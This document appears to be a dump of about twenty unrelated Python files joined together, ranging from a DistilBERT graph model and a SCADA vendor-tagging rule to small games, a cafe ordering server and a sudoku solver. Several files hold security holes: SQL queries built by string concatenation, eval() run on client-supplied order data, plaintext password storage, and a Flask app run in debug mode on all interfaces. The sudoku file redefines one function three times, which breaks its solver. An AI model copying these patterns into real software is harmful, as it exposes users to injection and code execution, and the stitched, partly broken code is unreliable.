import gc
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.modeling_distilbert import DistilBertPreTrainedModel, DistilBertModel
class MPLayer(nn.Module):
def __init__(self):
super(MPLayer, self).__init__()
def forward(self, p_scores, subgraph):
'''
Inputs:
*p*: predicate scores from Transformer
*adjacencies*: graph edges
Outputs:
*y*: answer activations
'''
# build subgraph adjacencies into a tensor
indices, relation_mask, entities = subgraph
num_entities = len(entities)
num_relations = p_scores.shape[0]
# subgraph = torch.sparse.FloatTensor(indices=indices, values=torch.ones(indices.size(1), dtype=torch.float).cuda(),
# size=(num_entities, num_entities*num_relations))
# propagate score from the Transformer
p_scores = p_scores.gather(0, relation_mask)
subgraph = torch.sparse.FloatTensor(indices=indices, values=p_scores,
size=(num_entities, num_entities*num_relations))
# _subgraph = torch.sparse.mm(p_scores, subgraph)
# MP step: propagates entity activations to the adjacent nodes
y = torch.sparse.mm(subgraph.t(), entities)
# and MP to entities summing over all relations
y = y.view(num_relations, num_entities).sum(dim=0) # new dim for the relations
# print(y.shape)
del p_scores, subgraph, indices, relation_mask
return y, num_entities
class MessagePassingBert(DistilBertPreTrainedModel):
r"""
**labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``:
Labels for computing the sequence classification/regression loss.
Indices should be in ``[0, ..., config.num_labels - 1]``.
If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Classification (or regression if config.num_labels==1) loss.
**logits**: ``torch.FloatTensor`` of shape ``(batch_size, config.num_labels)``
Classification (or regression if config.num_labels==1) scores (before SoftMax).
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForSequenceClassification.from_pretrained('bert-base-uncased')
input_ids = ...
labels = torch.tensor([1]).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=labels)
loss, logits = outputs[:2]
""" # noqa: ignore flake8"
def __init__(self, config):
super(MessagePassingBert, self).__init__(config)
self.bert = DistilBertModel(config)
# self.dropout = nn.Dropout(0.1)
self.classifier = nn.Linear(config.hidden_size, self.config.num_labels)
# the predicted score is then propagated via a message-passing layer
self.mp = MPLayer()
self.init_weights()
def forward(
self,
input_ids=None,
subgraph=None,
attention_mask=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
):
outputs = self.bert(
input_ids,
attention_mask=attention_mask
)
# Complains if input_embeds is kept
hidden_state = outputs[0]
pooled_output = hidden_state[:, 0]
# pooled_output = self.dropout(pooled_output)
predicate_logits = self.classifier(pooled_output)
# MP layer takes predicate scores and propagates them to the adjacent entities
logits, num_entities = self.mp(predicate_logits.view(-1), subgraph)
del subgraph
outputs = (logits,)# + outputs[2:] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, num_entities), labels.view(-1))
outputs = (loss,) + outputs
del logits
gc.collect()
torch.cuda.empty_cache()
return outputs # (loss), logits, (hidden_states), (attentions) |
"""web_access.py"""
import aiohttp
import asyncio
import logging
from typing import List
from itertools import islice
from devices import Device
logger = logging.getLogger('itl_mismatch_detector')
loop = asyncio.get_event_loop()
async def test_web_access(registered_devices: List[Device], max_parallel_connections:int = 30) -> List[Device]:
"""
Verify the list of registered devices to check whether the web access is enabled or not
:param registered_devices: the list of registered devices to test with
:param max_parallel_connections: the number of connections to establish in parallel
"""
session = aiohttp.ClientSession()
registered_devices_after_checks = []
test_connection_tasks = (is_web_enabled(session, device) for device in registered_devices)
while True:
parallel_tasks = list(islice(test_connection_tasks, max_parallel_connections))
if not parallel_tasks:
break
done, pending = await asyncio.wait(parallel_tasks, loop=loop)
for task in done:
registered_devices_after_checks.append(task.result())
session.close()
return registered_devices_after_checks
async def is_web_enabled(session:aiohttp.ClientSession, device:Device) -> Device:
"""
Attempt the connection to device web access to confirm that it's enabled or not
:param session: active ClientSession
:param device: device to use for test
"""
logger.info('Testing device: %s %s', device.name, device.ip_address)
print(f'Testing device: {device.name} {device.ip_address}')
try:
async with session.get(f'http://{device.ip_address}', timeout=5) as resp:
if resp.status == 200:
device.web_access = True
return device
except asyncio.TimeoutError:
device.web_access = False
return device
except (aiohttp.ClientConnectionError,
aiohttp.ServerDisconnectedError,
aiohttp.ClientError):
device.web_access = False
return device
device.web_access = False
return device |
rock = '''
_______
---' ____)
(_____)
(_____)
(____)
---.__(___)
'''
paper = '''
_______
---' ____)____
______)
_______)
_______)
---.__________)
'''
scissors = '''
_______
---' ____)____
______)
__________)
(____)
---.__(___)
'''
moves= [rock,paper,scissors]
userMove = input("What do you choose?\n0 for Rock, 1 for Paper & 2 for Scissors.\n")
import random
compMove = random.choice(moves)
if userMove == "0":
print(f"{rock}\nComputer chose:")
if compMove == rock:
print(f"{rock}\nTied!")
elif compMove == paper:
print(f"{paper}\nYou Lost!")
else:
print(f"{scissors}\nYou Won!")
elif userMove == "1":
print(f"{paper}\nComputer chose:")
if compMove == rock:
print(f"{rock}\nYou Won!")
elif compMove == paper:
print(f"{paper}\nTied!")
else:
print(f"{scissors}\nYou Lost!")
elif userMove == "2":
print(f"{scissors}\nComputer chose:")
if compMove == rock:
print(f"{rock}\nYou Lost!")
elif compMove == paper:
print(f"{paper}\nYou Won!")
else:
print(f"{scissors}\nTied!")
else:
print("Your move isn't available. Please choose between 0 to 2 inclusive")
#or
# game_images = [rock, paper, scissors]
# user_choice = int(input("What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\n"))
# print(game_images[user_choice])
# computer_choice = random.randint(0, 2)
# print("Computer chose:")
# print(game_images[computer_choice])
# if user_choice >= 3 or user_choice < 0:
# print("You typed an invalid number, you lose!")
# elif user_choice == 0 and computer_choice == 2:
# print("You win!")
# elif computer_choice == 0 and user_choice == 2:
# print("You lose")
# elif computer_choice > user_choice:
# print("You lose")
# elif user_choice > computer_choice:
# print("You win!")
# elif computer_choice == user_choice:
# print("It's a draw")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sqlite3
def getAllRecord(table,c):
rq = "select * from " +table+" order by id desc"
return c.execute(rq)
def getRecord(table,idt,c):
rq = "select * from " +table+ " where id = '"+str(idt)+"'"
return c.execute(rq)
#return c.fetchall
def createNewRecord(table,param,c):
rq="INSERT INTO "+table+" "
par="("
for key in param.keys():
par=par+key+","
rq=rq+par[:-1]+") VALUES "
par="("
for val in param.values():
par=par+"'"+str(val)+"',"
rq=rq+par[:-1]+")"
return c.execute(rq)
def updateFieldRecord(table,param,idt,c):
rq= "update "+ table +" set"
par = " "
cl = []
vl = []
for key in param.keys():
cl.append(key)
for val in param.values():
vl.append(val)
for j in range(len(cl)):
par = par+cl[j]+"= '"+str(vl[j])+"',"
rq = rq+par[:-1]+" where id = '"+str(idt)+"'"
return c.execute(rq)
#c.execute("select * from "+table)
#return c.fetchall()
def deleteRecord(table,idt,c):
rq="delete from "+ table +" where id = '"+str(idt)+"'"
return c.execute(rq)
#return c.fetchall()
def getIdperson(table,entry,c):
rq = "select id from "+table+" where name = "+entry+ "or function= "+entry
c.execute(rq)
idt=c.fetchone()
if idt is not None:
return idt
else:
return 0
def getId(table,entry,c):
rq = "select id from "+table+" where name = "+entry
c.execute(rq)
idt=c.fetchone()
if idt is not None:
return idt
else:
return 0
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the decentNumber function below.
def decentNumber(n):
threes=n
while(threes%3!=0):
threes=threes-5
if threes<0:
print(-1)
return
print(('5'*threes+'3'*(n-threes)))
if __name__ == '__main__':
t = int(input().strip())
for t_itr in range(t):
n = int(input().strip())
decentNumber(n)
|
from ztag.annotation import *
class FoxBrand(Annotation):
port = 1911
protocol = protocols.FOX
subprotocol = protocols.FOX.DEVICE_ID
_vendors = {
"vykon": (Manufacturer.VYKON, Type.SCADA_CONTROLLER),
"facexp": (Manufacturer.FACEXP, Type.SCADA_CONTROLLER),
"websopen": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
"webs": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
"distech": (Manufacturer.DISTECH, Type.SCADA_CONTROLLER),
"centraline": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
"staefa": (Manufacturer.SIEMENS, Type.SCADA_CONTROLLER),
"tac": (Manufacturer.SCHNEIDER, Type.SCADA_CONTROLLER),
"webeasy": (Manufacturer.WEBEASY, Type.SCADA_CONTROLLER),
"alerton": (Manufacturer.ALERTON, Type.HVAC),
"nexrev": (Manufacturer.NEXREV, Type.HVAC),
"comfortpoint": (Manufacturer.HONEYWELL, Type.SCADA_CONTROLLER),
"novar.opus": (Manufacturer.NOVAR, Type.HVAC),
"trend": (Manufacturer.TREND, Type.SCADA_CONTROLLER),
"tridium": (Manufacturer.TRIDIUM, Type.SCADA_CONTROLLER),
"bactalk": (Manufacturer.ALERTON, Type.SCADA_CONTROLLER),
"webvision": (Manufacturer.HONEYWELL, Type.HVAC),
"trane": (Manufacturer.TRANE, Type.HVAC),
"integra": (Manufacturer.INTEGRA, Type.CINEMA),
"wattstopper": (Manufacturer.WATTSTOPPER, Type.LIGHT_CONTROLLER),
"vyko": (Manufacturer.VYKON, Type.SCADA_CONTROLLER),
"eiq": (Manufacturer.EIQ, Type.SOLAR_PANEL),
"thinksimple": (Manufacturer.THINK_SIMPLE, Type.SCADA_CONTROLLER),
}
tests = {
"vykon": {
"global_metadata": {
"manufacturer": Manufacturer.VYKON,
"device_type": Type.SCADA_CONTROLLER,
},
},
"wattstopper": {
"global_metadata": {
"manufacturer": Manufacturer.WATTSTOPPER,
"device_type": Type.LIGHT_CONTROLLER,
},
},
"thinksimple": {
"global_metadata": {
"manufacturer": Manufacturer.THINK_SIMPLE,
"device_type": Type.SCADA_CONTROLLER,
},
},
}
def process(self, obj, meta):
vendor = obj["brand_id"].lower().strip()
m, dt = self._vendors[vendor]
meta.global_metadata.manufacturer = m
meta.global_metadata.device_type = dt
return meta
|
import sys
from utils import *
import tensorflow as tf
tf.InteractiveSession
for x in range(1,len(sys.argv)):
arg = sys.argv[x]
features, labels = readFromCSV(arg)
print(features["Home Score"].shape)
# Define a and b as placeholders
a = tf.placeholder(dtype=tf.int32)
b = tf.placeholder(dtype=tf.int32)
# Define the addition
c = tf.add(a, b)
# Initialize the graph
graph = tf.Session()
# Run the graph
sumOfScores = graph.run(c, feed_dict={a: features["Home Score"][0], b: features["Visitor Score"][0]})
print "This is the sum of the first game's scores: "+str(sumOfScores)
|
import click
import pokeit
import checkit
import settings
import sys
@click.command()
@click.option('-uq', help='unique part of @id uri')
@click.option('-s', help='success criteria file')
@click.argument('template', type=click.File('rb'))
def main(uq, s, template):
"""Simple DLCS pipeline tester"""
exit_code, manifest = pokeit.pokeit(uq, s, template)
if exit_code == 0:
manifest = settings.PRESLEY_BASE + f"/customer/manifest?manifest_id={manifest}"
exit_code = checkit.checkit(manifest)
sys.exit(exit_code)
if __name__ == '__main__':
main()
|
#enmaneul hernandez
#movie trailer website
#part of code are from udacity learning material
import webbrowser
#class that make the blueprint for movie objects
class Movie():
"""This calss provides a way to store movie related information"""
VALID_RATINGS = ["G", "PG", "PG-13", "R"] #constant variable.
def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_youtube_url = trailer_youtube
#opens a web browser with the trailer of the movie
def show_trailer(self):
webbrowser.open(self.trailer_youtube_url)
|
from .abstract_request import AbstractRequest, AbstractRequestCodec
class RequestGetDetails(AbstractRequest):
opcode = 0x22
def __init__(self):
pass
class RequestGetDetailsCodec(AbstractRequestCodec):
@staticmethod
def encode(request):
return b''
@staticmethod
def decode(payload):
return RequestGetDetails()
|
path = 'scripts/increment_data_load.sql'
try:
open(path, 'w').close()
except IOError:
print('Failure')
import requests
url = "https://covidtrackerapi.bsg.ox.ac.uk/api/v2/stringency/date-range/2021-01-01/2021-08-01"
response = requests.get(url, headers={'Accept':'application/json'})
data = response.json()
data1 = data['data']['2021-01-01']
def output_api():
k = ''
for i in data1.items():
k += 'INSERT INTO epam (country_code, date_value, confirmed, deaths, stringency_actual, stringency) VALUES (' + "'"+ i[1]['country_code'] + "'" + ', ' + "'"+ i[1]['date_value'] + "'" + ", " + "'"+ str(i[1]['confirmed']) + "'" + ", " + "'"+ str(i[1]['deaths']) + "'" + ", " + "'"+ str(i[1]['stringency_actual']) + "'"+ ", " + "'"+ str(i[1]['stringency']) + "'"+ '); '
return k
with open('scripts/increment_data_load.sql', 'w') as f:
f.write(output_api())
from flask import Flask, render_template
import authentications as au, psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import sys
app = Flask(__name__)
show_result = 'scripts/select_query.sql'
t1 = ('country_code', 'date_value', 'confirmed', 'deaths', 'stringency_actual', 'stringency')
query = 'scripts/increment_data_load.sql'
def read_file():
with open(query, 'r') as r1:
return r1.read()
try:
conn = psycopg2.connect(au.connection_string)
cur = conn.cursor()
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cur.execute(read_file())
except psycopg2.DatabaseError as e:
print(f'Error {e}')
sys.exit(1)
finally:
if conn:
conn.close()
def read_file():
with open(show_result, 'r') as r1:
return r1.read()
def get_data():
con = None
try:
con = psycopg2.connect(au.connection_string)
cur = con.cursor()
cur.execute(read_file())
version = cur.fetchall()
return version, False
except psycopg2.DatabaseError as e:
return f'Error {e}', True
finally:
if con:
con.close()
@app.route('/')
def index():
_result, _error = get_data()
if _error:
return render_template('output_error.html', error_fatal=_error)
else :
return render_template('index.html', tt1=t1, output1=_result)
if __name__ == '__main__':
app.run(debug=True,host="0.0.0.0", port=80) |
# 특정 거리의 도시찾기 - BFS문제 p339
from collections import deque
n,m,k,x = map(int , input().split())
data = [[]for _ in range(n+1)]
for _ in range(m):
a,b = map(int , input().split())
data[a].append(b)
distance = [-1]*(n+1)
distance[x] = 0
#최단 거리 갱신
queue = deque([x])
while queue :
now = queue.popleft()
for next_node in data[now]:
if distance[next_node] == -1:
distance[next_node] = distance[now] +1
queue.append(next_node)
# 최단 거리가 k인 도시 찾기
check = False
for i in range(1,n+1):
if distance[i] == k:
print(i)
check = True
# 최단 거리가 k인 도시가 없을 때
if check == False:
print(-1)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(
r"^(?P<slug>[a-z0-9-_]+?)-(?P<upload_id>[0-9]+)/$",
views.product_details,
name="details",
)
]
|
# server functions
import datetime as dt
drinks=[]
d_cost=[]
food=[]
f_cost=[]
def order_menu():
global drinks,food,d_cost,f_cost
with open ("menu.dat","r") as file:
data=file.readlines()
drinks = eval(data[0])
d_cost = eval(data[1])
food = eval(data[2])
f_cost = eval(data[3])
def order():
return drinks,d_cost,food,f_cost
def ordering(cus_dets,ordered):
ordered=eval(ordered)
orders=cus_dets+f"\n{dt.datetime.now().strftime('%H:%M:%S / %Y-%m-%d')}"
total=0
for i in range (0,len(ordered)):
for k in range (0,len(drinks)):
if (ordered[i]==drinks[k]):
orders=orders+f"\n{drinks[k]} {d_cost[k]} "
total=total+int(d_cost[k])
for k in range(0, len(food)):
if (ordered[i]==food[k]):
orders=orders+f"\n{food[k]} {f_cost[k]}"
total = total + int(f_cost[k])
orders = orders + f"\nTotal :: {total}"
with open("orders.dat","a+") as file:
file.seek(0)
file.write("\n\n")
file.write(orders)
def authenticate(auth):
# Spliting data into lines
auth=str(auth)
with open("usr.dat", "r") as file:
data = file.readlines()
for line in data:
det=str(line)
# checking data in each line
for i in range (0,len(auth)):
if det[i]==auth[i]:
match=True
else :
match=False
break
if match==True :
return str(det)
if match==False:
return "Incorrect Username or Password"
def check(usr):
with open("usr.dat", "r") as file:
data = file.readlines()
for line in data:
det = str(line)
# checking data in each line
for i in range(0, len(usr)):
if det[i] == usr[i]:
match = True
else:
match = False
break
if match == True and det[len(usr)]==':':
return 'false'
if match == False:
return "true"
def new_acc(crd):
with open("usr.dat","a+") as file:
file.seek(0)
file.write(crd)
return "True"
def edit(edit_det):
auth=us_pass(edit_det)
current_det=authenticate(auth)
fin = open("usr.dat", "rt")
data = fin.read()
data = data.replace(str(current_det), str(edit_det+'\n'))
fin.close()
fin = open("usr.dat", "wt")
fin.write(data) # overrite the input file with the resulting data
fin.close()
def us_pass(edit_det):
temp=edit_det
for j in range (0,2):
for i in range(0,len(temp)):
if (temp[i]+temp[i+1]=='::'):
temp=temp[i+2:]
break
else :
if (j == 0):
uname=temp[0:i+1]
elif(j == 1):
passwd = temp[0:i + 1]
return (uname+'::'+passwd+'::')
def chng_pass(new_pass,curr_pass):
fin = open("usr.dat", "rt")
data = fin.read()
data = data.replace(str(curr_pass), str(new_pass))
fin.close()
fin = open("usr.dat", "wt")
fin.write(data) # overrite the input file with the resulting data
fin.close()
def feedback(feed):
with open("feedback.dat","a+") as file:
file.seek(0)
file.write("\n")
file.write(feed)
def s_orders():
his=""
temp=""
flag=2
with open ("orders.dat","r") as file:
data=file.readlines()
for line_read in data:
if "Username" in line_read:
flag=1
elif "Total" in line_read :
flag=0
if len(line_read)!=0:
temp = f"{temp} {line_read}"
if flag == 0 :
his=f"{temp}\n{his}"
flag=2
temp=""
return his
def order_history(cus_dets):
flag=False
his=''
with open("orders.dat", "r") as file:
data = file.readlines()
for line in data:
det=str(line)
if cus_dets in det :
flag = True
his = '\n=================' + his
elif 'Total' in det:
his = f'\n{det}\n----------------'+his
his = '\n\n=================' + his
flag = False
elif ( flag == True and cus_dets not in det):
if("Name ::" not in det):
his=f'\n{det}'+his
if his=='':
return "No Orders"
else:
return his[:2000]
def add(addr):
add_str=""
for i in range (0,len(addr)):
add_str=addr[i]+"\n"+add_str
return add_str
def add_items(o,n,c):
global drinks, food, d_cost, f_cost
if o=="New Food Item" and len(food) < 10:
food.append(n)
f_cost.append(c)
flag=1
elif o=="New drinks" and len(drinks) < 10:
drinks.append(n)
d_cost.append(c)
flag = 1
if flag==1:
temp=str(drinks)+"\n"+str(d_cost)+"\n"+str(food)+"\n"+str(f_cost)
fout = open("menu.dat","wt")
fout.write(temp)
fout.close()
def rm_items(item):
global drinks,food,d_cost,f_cost
for i in range (0,len(drinks)):
print(drinks[i],i)
if item==drinks[i]:
drinks.remove(item)
d_cost.remove(d_cost[i])
break
for i in range (0,len(food)):
print(food[i],i)
if item==food[i]:
food.remove(item)
f_cost.remove(f_cost[i])
break
temp=str(drinks)+"\n"+str(d_cost)+"\n"+str(food)+"\n"+str(f_cost)
fout = open("menu.dat","wt")
fout.write(temp)
fout.close()
def read_feedback():
with open ("feedback.dat","r") as file:
feed=file.read()
return feed |
import uuid
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
class User(AbstractUser):
token = models.UUIDField(unique=True, default=uuid.uuid4, editable=False)
def dictify(self):
return dict(
name=self.get_full_name(),
email=self.username,
id=self.pk,
created=self.date_joined,
# by the API specification there is not way to modify the user
modified=self.date_joined,
token=self.token,
last_login=self.last_login or self.date_joined,
phones=[phone.dictify() for phone in self.phones.all()])
def get_absolute_url(self):
return reverse('view-user', kwargs={'pk': self.pk})
class Phone(models.Model):
user = models.ForeignKey(User, related_name='phones')
number = PhoneNumberField()
ddd = models.CharField(max_length=2)
def dictify(self):
return dict(
number=self.number.as_international,
ddd=self.ddd)
class Meta:
unique_together = (("user", "ddd", "number"),)
|
import pygame, sys # inicializando librerias
pygame.init() #inicializando pygame
#DEFINIR COLORES
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
size = (800, 500) #definir tamaño
#crear ventana
screen = pygame.display.set_mode(size)
#Controlar el reloj del programa
clock = pygame.time.Clock()
#coordenadas del objeto
cord_x = 40
cord_y = 40
#velocidad del objeto
speed_x = 3
speed_y = 3
#creando el bucle principal
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit() #SALIR
#-------------LOGICA DEL JUEGO-------------------
if(cord_x > 760 or cord_x < 40):
speed_x *= -1
if(cord_y > 460 or cord_y < 40):
speed_y *= -1
cord_x += speed_x
cord_y += speed_y
#----------FIN DE LA LÓGICA DEL JUEGO-----------------------
#cambiar de color a la pantalla
screen.fill(WHITE)
### -------zona de dibujo
#pygame.draw.line(screen, GREEN, [0,0],[0,800],5) # Dibujar una línea
pygame.draw.lines(screen, RED, True, [(0,0),(800,0),(800,500),(0,500)],5)
pygame.draw.circle(screen, BLUE, (cord_x,cord_y), 40)
##### -----------------
#actualizar la pantalla
pygame.display.flip()
#Definir el reloj para controlar los FRAMES POR SEGUNDO
clock.tick(1000)
|
import constraint
def o1(x,y,z):
if x+y+z == 38:
return True
def o2(x,y,z,w):
if x+y+z+w == 38:
return True
def o3(x,y,z,w,h):
if x+y+z+w+h == 38:
return True
problem = constraint.Problem()
problem.addVariables("ABCDEFGHIJKLMNOPQRST", range(1,38))
problem.addConstraint(constraint.AllDifferentConstraint())
# Dodajemo ogranicenja za svaku horizontalnu liniju
# A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
# Q,R,S
problem.addConstraint(o1,"ABC")
problem.addConstraint(o2,"DEFG")
problem.addConstraint(o3,"HIJKL")
problem.addConstraint(o2,"MNOP")
problem.addConstraint(o1,"QRS")
# Dodajemo ogranicenja za svaku od glavnih dijagonala
# A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
# Q,R,S
problem.addConstraint(o1,"HMQ")
problem.addConstraint(o2,"DINR")
problem.addConstraint(o3,"AEJOS")
problem.addConstraint(o2,"BFKP")
problem.addConstraint(o1,"CGL")
# Dodajemo ogranicenja za svaku od sporednih dijagonala
# A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
# Q,R,S
problem.addConstraint(o1,"ADH")
problem.addConstraint(o2,"BEIM")
problem.addConstraint(o3,"CFJNQ")
problem.addConstraint(o2,"GKOR")
problem.addConstraint(o1,"LPS")
resenja = problem.getSolutions()
for r in resenja:
print(" -----------------")
print(" {0:d},{1:d},{2:d}".format(r['A'],r['B'],r['C']))
print(" {0:d},{1:d},{2:d},{3:d}".format(r['D'],r['E'],r['F'],r['G']))
print("{0:d},{1:d},{2:d},{3:d},{4:d}".format(r['H'],r['I'],r['J'],r['K'],r['L']))
print(" {0:d},{1:d},{2:d},{3:d}".format(r['M'],r['N'],r['O'],r['P']))
print(" {0:d},{1:d},{2:d}".format(r['Q'],r['R'],r['S']))
print(" -----------------")
|
# 1. 삽입 정렬 (insertion sort)
# - 삽입 정렬은 ★두 번째 인덱스★부터 시작
# - 해당 인덱스(key 값) 앞에 있는 데이터(B)부터 비교해서
# key 값이 더 작으면 B값을 뒤 인덱스로 복사
# - 이를 key 값이 더 큰 데이터를 만날때까지 반복, 그리고 큰 데이터를 만난 위치
# 바로 뒤에 key 값을 이동
# 참고 : https://visualgo.net/en/sorting
# 이해 : https://goo.gl/XKBXuk
# # 2. 알고리즘 구현
# def insertion_sort(data):
# for index in range(len(data)-1):
# for index2 in range(index+1, 0, -1):
# if data[index2] < data[index2 - 1]:
# data[index2],data[index2 -1] = data[index2 - 1],data[index2]
# else:
# break
# return data
# import random
# data_list = random.sample(range(100), 10)
# print(insertion_sort(data_list))
# # 2-1
# rand_data_list = [3, 5, 1, 2]
# def insertion_sort2(data_list):
# for stand in range(len(data_list)-1):
# for num in range(stand+1, 0, -1):
# if data_list[num] < data_list[num-1]:
# data_list[num], data_list[num-1] = data_list[num-1], data_list[num]
# else:
# break
# return data_list
# print(insertion_sort2(rand_data_list))
# 3. 알고리즘 분석
# - 버블정렬과 동일하다.
|
num = 1
for i in range(1, 6): # Controla el número de filas
for j in range(1, 6 - i): # Imprime espacios en blanco
print(" ", end="")
for j in range(1, i + 1): # Imprime números
print(num, end=" ")
num += 1
if num > 10: # Detiene la secuencia al llegar a 10
break
print()
|
#!/c/Python/python.exe
# -*-coding:utf-8 -*
from random import *
#prend une ligne aleatoire dans le fichier 'fichier'
#attention: la premiere ligne est une excepetion du fait du \n
def lire_fichier_sudoku(fichier,ligne):
with open(fichier,'r') as mon_fichier:
texte=mon_fichier.read()
nombres = list()
if ligne==1:
for i in range(81):
nombres.append(texte[i])
else:
for i in range(82*(ligne-1),82*(ligne-1)+81):
nombres.append(texte[i])
return nombres
#saisir dans input la grille sudoku
def saisir_sudoku():
try:
n=input("veuillez mettre 81 chiffres ")
nombres=int(n)
except ValueError : #si se n'est pas un int
print("saisir des CHIFFRES entre 0 et 9...")
else:
if len(n)!=81: #si ce n'est pas la bonne dimension
raise Exception("pas le bon nombre de chiffres")
else:
return nombres
#transforme une liste de 81 int en une grille sudoku( liste de lsite de int )
def liste_to_grille(nombres):
grille = [ [int for i in range(9)] for j in range(9) ]
for ligne in range(9):
for colonne in range(9):
grille[ligne][colonne]=int(nombres[ligne*9+colonne])
return grille
#print la grille comme demandé
def afficher_sudoku(grille):
print("-------------")
for ligne in range(9):
for colonne in range(9):
#en fonction de la colonne printer '|'
if colonne == 0:
print("|"+str(grille[ligne][colonne]),end='')
elif colonne in (2,5):
print(str(grille[ligne][colonne])+"|",end='')
elif colonne == 8:
print(str(grille[ligne][colonne])+"|")
if ligne in(2,5,8):
print("-------------")
else:
print(str(grille[ligne][colonne]),end='')
#teste si une grille est valide, en parcourant toute la grille
#return un boolean (True si valide)
def est_valide(grille):
res=True
#si une ligne a plus de une fois le meme chiffre, ou si il y a un 0
#revoie false
for ligne in range(9):
for i in range(1,10):
if grille[ligne].count(i) != 1 or grille[ligne].count(0) >0:
res=False
#meme chose mais avec colonne
#cette fois ci, la liste des chifffres d'une colonne serons sauvegardé dans temp()
temp=list()
for colonne in range(9):
for ligne in range(9):
temp.append(grille[ligne][colonne])
for i in range(1,10):
if temp.count(i) != 1:
res=False
temp=[]
#pour les zones, en fonction de quelle zone on esst, le range de la boucle for change
for zone in range(9):
if(zone in(0,1,2)):
limite_colonne=3*zone
limite_ligne=0
elif(zone in(3,4,5)):
limite_colonne=3*(zone-3)
limite_ligne=3
else:
limite_colonne=3*(zone-6)
limite_ligne=6
for ligne in range(limite_ligne,3+limite_ligne):
for colonne in range(limite_colonne,3+limite_colonne):
temp.append(grille[ligne][colonne])
for i in range(1,10):
if temp.count(i) != 1:
res=False
temp=[]
return res
#definition qui chercher, pour une case donnée, dans quelle zone elle est
def quelle_zone(ligne,colonne):
if ligne<3 and colonne<3:
res=0
elif ligne<3 and colonne<6:
res=1
elif ligne<3 and colonne<9:
res=2
elif ligne<6 and colonne<3:
res=3
elif ligne<6 and colonne<6:
res=4
elif ligne<6 and colonne<9:
res=5
elif ligne<9 and colonne<3:
res=6
elif ligne<9 and colonne<6:
res=7
else:
res=8
return res
#M est un tableau 3D qui dit, pour chaque possibilité de numero dans une case,
#si on peut ou pas se mettre
def remplie_M(grille):
M = [ [ [0 for i in range(9)] for j in range(9)] for k in range(9) ]
for ligne in range(9):
for colonne in range(9):
k=grille[ligne][colonne]
if k != 0:
#d'abord on verifie les colonnes et les lignes et la propres case
for i in range(9):
M[ligne][i][k-1]=1
M[i][colonne][k-1]=1
M[ligne][colonne][i]=1
#ensuite on regarde les zones
zone=quelle_zone(ligne,colonne)
if(zone in(0,1,2)):
limite_colonne=3*zone
limite_ligne=0
elif(zone in(3,4,5)):
limite_colonne=3*(zone-3)
limite_ligne=3
else:
limite_colonne=3*(zone-6)
limite_ligne=6
for li in range(limite_ligne,3+limite_ligne):
for co in range(limite_colonne,3+limite_colonne):
M[li][co][k-1]=1
return M
#resolution de maniere simple de la grille
#si dans M il y a une seule possibilité, on met le chiffre
def remplie_grille(grille):
while not est_valide(grille):
M=remplie_M(grille)
a_change=False
for ligne in range(9):
for colonne in range(9):
if M[ligne][colonne].count(0)==1:
chiffre=M[ligne][colonne].index(0)+1
grille[ligne][colonne]=chiffre
a_change=True
#il toure en boucle si la grille n'est pas simple
#on decide de break si il n'a plus rien a changer
if not a_change:
break
return grille
#comme la methode copy() marche pas pour une double liste
#on creer nous meme la methode
#on copie la grille case par case
def copier(grille):
res=[[int for i in range(9)] for j in range(9)]
for ligne in range(9):
for colonne in range(9):
res[ligne][colonne]=grille[ligne][colonne]
return res
def copier(grille, l):
res=[[int for i in range(9)] for j in range(9)]
for colonne in range(9):
res[l][colonne]=grille[l][colonne]
return res
def copier(grille,l,c):
res=[[int for i in range(9)] for j in range(9)]
res[l][c]=grille[l][c]
return res
#test si la grille peut etre resolue de maniere simple
#vu que la methode remplie_grille modifie la grille en parametre
#on fait une copie avant
def est_resolvable(a):
b=copier(a)
remplie_grille(b)
res=est_valide(b)
return res
#methode qui resoud grille meme complexe
#on va parcourir la grille et la ou on a le choix enrte seulement 2 chiffre
#on esseye un et on test est_resolvable
#si non, on enregistre la grille dans une liste 'memoire' (copies()) et on esseye
#le deuxieme chiffre et on continue avec ce deuxieme chiffre
#
#une fois qu'il a parcourue toute les cases et esseyer de mettre des chiffre
#on reapelle la methode avec une grille dans la liste memoire, ainsi de suite
#
#PROBLEME: solution recursive qui prend beaucoup trop de temp, plusieurs minutes meme
